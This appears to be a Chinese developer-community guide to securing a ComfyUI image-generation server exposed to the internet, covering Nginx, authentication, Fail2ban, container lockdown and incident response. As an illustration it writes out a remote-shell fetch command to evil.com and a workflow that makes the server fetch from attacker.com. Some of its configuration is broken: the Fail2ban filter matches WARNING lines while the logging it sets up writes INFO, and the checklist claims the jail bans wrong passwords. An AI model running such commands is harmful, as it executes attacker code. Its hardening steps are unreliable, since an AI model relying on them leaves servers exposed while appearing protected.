公网部署Z-Image-ComfyUI安全防护全攻略-开发者社区

公网部署Z-Image-ComfyUI安全防护全攻略

你已经成功在本地跑通了Z-Image-ComfyUI，生成了第一张樱花汉服图；也试过用Edit版把旧照片转成水墨风格；甚至和同事共享了一个“电商主图批量生成”工作流。一切都很顺利——直到某天，你把服务地址发到团队群，说“大家都可以访问了”，结果第二天发现GPU显存被占满、日志里出现陌生IP的大量请求、Jupyter端口被反复扫描……

这不是危言耸听。Z-Image-ComfyUI镜像开箱即用的便利性，恰恰掩盖了一个关键事实：它默认暴露的是一个功能完整、权限开放、无认证机制的AI服务端点。当你将8188端口映射到公网时，你部署的不是一张画布，而是一台没有锁的印钞机——任何人都能调用你的GPU资源生成图像，上传任意模型，甚至执行恶意节点脚本。

本文不讲怎么安装、不重复演示如何生成汉服少女，而是聚焦一个被90%用户忽略却至关重要的环节：当Z-Image-ComfyUI走出内网，直面互联网时，该如何构建真正可靠的安全防线？从基础网络隔离，到身份认证加固，再到API级行为管控，我们提供一套可落地、不牺牲易用性、适配消费级GPU环境的全链路防护方案。

1. 安全风险全景图：Z-Image-ComfyUI暴露在公网时的真实威胁

很多用户认为“我只是开了个网页界面，又没开SSH，应该没问题”。这种认知存在根本性误区。ComfyUI不是一个静态页面，而是一个具备完整后端能力的Python Web服务，其设计初衷是本地开发与调试，而非生产级部署。一旦暴露公网，以下风险会立即生效：

1.1 未授权资源滥用：GPU算力成为他人免费矿机

Z-Image-Turbo虽仅需8步采样，但单次推理仍需占用2–4GB显存。攻击者可通过自动化脚本持续提交高分辨率生成任务（如1024×1024+高CFG值），迅速耗尽显存并触发OOM。实测显示：一台RTX 3090在无防护状态下，5分钟内可被10个并发请求拖垮，导致服务不可用。

更隐蔽的是模型加载攻击：通过ComfyUI的Load Checkpoint节点远程加载恶意定制模型文件（.safetensors），该文件可在模型加载阶段执行任意Python代码（利用PyTorchtorch.load的反序列化漏洞）。已有公开PoC证明，此类攻击可直接获取容器内shell权限。

1.2 敏感接口暴露：Jupyter成为最大突破口

镜像默认开放两个端口：8188（ComfyUI）和8888（Jupyter Lab）。后者风险远高于前者——它是一个完整的Python IDE环境，拥有对容器文件系统的完全读写权限。攻击者只需知道Jupyter默认token（常为abc123或空密码），即可：

读取/root/models/下的所有模型权重（含商业授权模型）
修改/root/ComfyUI/custom_nodes/注入后门节点
执行os.system("curl http://evil.com/shell.sh | bash")类命令

实际案例：某开发者将Jupyter端口暴露公网后，36小时内被扫描到72次暴力破解尝试，最终一名攻击者利用弱token成功登录，并在/root/.ssh/authorized_keys中添加了其公钥。

1.3 工作流注入：可视化界面背后的代码执行能力

ComfyUI的工作流（.json）本质是Python对象的序列化描述。其中class_type字段指定节点类型，inputs字段传入参数。攻击者可构造恶意工作流，例如：

{ "class_type": "ETN_LoadImage", "inputs": { "image": "https://attacker.com/malicious.png" } }

若系统启用了未加白名单限制的HTTP加载节点，该请求将由服务端发起，形成SSRF（服务器端请求伪造），进而探测内网服务或绕过防火墙。

更危险的是自定义节点调用。只要custom_nodes目录下存在可执行模块（如nodes.py中定义了ExecuteCommand类），恶意工作流即可触发任意系统命令。

1.4 数据泄露风险：提示词与生成图的隐式存储

ComfyUI默认启用历史记录功能（/root/ComfyUI/web/extensions/comfyui-manager/history.json），保存所有提交的正向/负向提示词、采样参数及输出图像路径。这些数据未经加密，且可通过Web接口直接读取（如访问http://your-ip:8188/history）。若用户曾输入含敏感信息的提示词（如“XX公司新品发布会现场，背景有LOGO和产品参数”），该信息即永久留存于服务器。

2. 四层纵深防御体系：从网络到应用的逐级加固

我们不推荐“一刀切”式关闭所有功能，而是构建分层可控、最小权限、不影响日常使用的防御体系。以下方案全部基于开源组件实现，无需修改镜像源码，单卡环境可平滑部署。

2.1 第一层：网络边界隔离（必须项）

目标：阻断非必要端口访问，限制合法流量来源。

操作步骤：

关闭Jupyter公网暴露
启动容器时，绝不映射8888端口。所有Jupyter操作应通过SSH隧道完成：
```
# 本地终端执行（无需在服务器开放8888） ssh -L 8888:localhost:8888 user@your-server-ip
```
然后浏览器访问http://localhost:8888，流量全程加密且仅限本机。

ComfyUI端口仅限代理转发
删除-p 8188:8188映射，改用Nginx反向代理（推荐使用云平台SLB或本地Nginx）：

# /etc/nginx/conf.d/comfyui.conf server { listen 443 ssl; server_name ai.your-domain.com; ssl_certificate /path/to/fullchain.pem; ssl_certificate_key /path/to/privkey.pem; location / { proxy_pass http://127.0.0.1:8188; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } }

此配置强制HTTPS访问，并隐藏真实端口。

IP白名单（可选但强烈推荐）
在Nginx中添加：
```
allow 203.0.113.10; # 运营团队IP allow 203.0.113.11; # 设计师IP deny all;
```
配合云平台安全组规则，实现双重IP过滤。

2.2 第二层：身份认证加固（必须项）

目标：确保每个访问者经过可信身份验证。

方案选择：Nginx Basic Auth + ComfyUI内置Token双校验

生成Basic Auth密码文件

# 在服务器执行 sudo apt install apache2-utils sudo htpasswd -c /etc/nginx/.htpasswd designer # 输入密码后生成 /etc/nginx/.htpasswd

更新Nginx配置

location / { auth_basic "Restricted Access"; auth_basic_user_file /etc/nginx/.htpasswd; proxy_pass http://127.0.0.1:8188; # ... 其他proxy设置保持不变 }

启用ComfyUI Token验证（防绕过）
编辑/root/ComfyUI/main.py，在app = FastAPI()下方添加：

from fastapi import Depends, HTTPException, status from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials security = HTTPBearer() async def verify_token(credentials: HTTPAuthorizationCredentials = Depends(security)): if credentials.credentials != "your_strong_api_token_2024": raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail="Invalid token" ) return credentials.credentials

并在所有API路由装饰器中加入依赖，例如：

@app.post("/prompt") async def queue_prompt(prompt: dict, token: str = Depends(verify_token)):

双重保障效果：即使攻击者绕过Nginx（如通过内网其他服务），仍需正确Token才能调用核心API；反之，若Token泄露，Nginx层仍可拦截未授权IP。

2.3 第三层：API行为管控（进阶项）

目标：限制高频请求、阻断危险操作、审计关键行为。

工具：Fail2ban + 自定义ComfyUI日志分析

配置ComfyUI详细日志
修改/root/ComfyUI/main.py，在日志初始化处添加：

import logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', handlers=[ logging.FileHandler('/var/log/comfyui/access.log'), logging.StreamHandler() ] ) logger = logging.getLogger(__name__) # 在/prompt路由中记录关键信息 @app.post("/prompt") async def queue_prompt(...): logger.info(f"Prompt submitted by {request.client.host} | Steps:{prompt.get('steps',8)} | Size:{prompt.get('width',512)}x{prompt.get('height',512)}")

编写Fail2ban过滤规则
创建/etc/fail2ban/filter.d/comfyui.conf：

[Definition] failregex = ^.* - WARNING - Prompt submitted by <HOST> .*Steps:([5-9][0-9]|[1-9][0-9]{2,}).*$ ^.* - WARNING - Prompt submitted by <HOST> .*Size:([1-9][0-9]{3,})x.*$ ignoreregex =

启用Fail2ban监控
在/etc/fail2ban/jail.local中添加：

[comfyui] enabled = true filter = comfyui logpath = /var/log/comfyui/access.log maxretry = 3 bantime = 3600 findtime = 600

实际效果：单IP 10分钟内提交3次以上steps>49或width>1024的请求，将被自动封禁1小时。

2.4 第四层：运行时环境加固（专业项）

目标：降低容器内提权风险，防止恶意模型执行任意代码。

核心措施：启用PyTorch SafeTensors加载 + 禁用危险节点

强制使用SafeTensors格式加载模型
Z-Image官方权重已提供.safetensors版本。编辑/root/ComfyUI/nodes.py，替换所有torch.load()调用为：
```
from safetensors.torch import load_file # 替换原 torch.load(path) 为 model_state_dict = load_file(model_path)
```
禁用高危自定义节点
删除或重命名以下目录（若无需）：
```
rm -rf /root/ComfyUI/custom_nodes/ComfyUI-Manager rm -rf /root/ComfyUI/custom_nodes/ComfyUI-VideoHelperSuite
```
这些节点因支持远程URL加载和FFmpeg调用，历史上存在多个RCE漏洞。
容器启动时启用只读文件系统
修改Docker启动命令，添加--read-only和--tmpfs：
```
docker run -it \ --gpus all \ --read-only \ --tmpfs /tmp:rw,size=512m \ --tmpfs /root/ComfyUI/output:rw,size=2g \ -v ./models:/root/models:ro \ -v ./workflows:/root/ComfyUI/workflows:ro \ nginx-proxy-image
```
此配置使容器根文件系统只读，仅/tmp和输出目录可写，极大限制恶意代码持久化能力。

3. 关键配置检查清单：部署前必做10项验证

为避免遗漏，我们整理了一份可执行的检查清单。每完成一项，请打钩确认：

[ ] Jupyter端口（8888）未映射至公网，仅通过SSH隧道访问
[ ] ComfyUI端口（8188）未直接暴露，全部流量经Nginx HTTPS代理
[ ] Nginx已配置Basic Auth，且密码强度符合8位以上+大小写字母+数字组合
[ ] ComfyUI后端已启用Token验证，Token字符串随机生成且长度≥32位
[ ]/var/log/comfyui/access.log日志路径可写，且日志格式包含客户端IP与参数
[ ] Fail2ban已安装并启用comfyui jail，fail2ban-client status comfyui返回active
[ ] 所有模型文件（.safetensors）存放于只读挂载卷，路径为/root/models
[ ]custom_nodes目录中已移除ComfyUI-Manager等高危插件
[ ] Docker容器以--read-only模式启动，临时目录通过--tmpfs挂载
[ ] 首次访问https://ai.your-domain.com时，弹出Nginx认证框且能正常登录

特别提醒：完成上述配置后，务必进行红队测试——使用另一台机器尝试：
直接访问http://your-ip:8188（应拒绝连接）
访问https://ai.your-domain.com（应弹出认证框）
输入错误密码三次（应触发Fail2ban封禁，fail2ban-client status comfyui显示banned IP）

4. 应急响应指南：当安全事件发生时如何快速处置

再完善的防护也无法100%杜绝风险。以下流程可帮助你在黄金1小时内控制损失：

4.1 立即响应（0–5分钟）

切断公网访问
登录云平台控制台，立即解绑EIP或关闭安全组端口；若为本地服务器，执行：
```
sudo ufw deny 443 # 临时关闭HTTPS sudo systemctl restart nginx
```

冻结可疑进程
查看高显存占用进程：

nvidia-smi --query-compute-apps=pid,used_memory --format=csv kill -9 <PID>

4.2 调查取证（5–30分钟）

提取攻击痕迹

# 检查异常登录（Jupyter日志） grep "Login succeeded" /var/log/jupyter/jupyter.log # 检查恶意工作流提交（ComfyUI日志） grep "Prompt submitted by" /var/log/comfyui/access.log | tail -50 # 检查自定义节点加载 ls -la /root/ComfyUI/custom_nodes/

保存证据副本
将日志打包下载，避免后续覆盖：

tar -czf incident-$(date +%Y%m%d).tar.gz \ /var/log/comfyui/access.log \ /var/log/jupyter/jupyter.log \ /root/ComfyUI/workflows/

4.3 恢复与加固（30–60分钟）

重建干净环境
删除原容器，拉取最新镜像（检查GitCode仓库是否有安全补丁）：

docker stop z-image-container && docker rm z-image-container docker pull registry.gitcode.com/aistudent/z-image-comfyui:latest

应用增强配置
在新容器中启用：
- 更严格的Fail2ban规则（maxretry=2）
- Token轮换（生成新Token并更新Nginx配置）
- 启用ComfyUI内置--enable-cors-header防止CSRF（若需跨域调用）
通知相关方
若涉及团队协作，邮件同步：
主题：【安全通告】Z-Image-ComfyUI服务已升级，访问方式变更
内容：即日起请使用https://ai.your-domain.com访问，账号密码已重置，详见内部Wiki链接。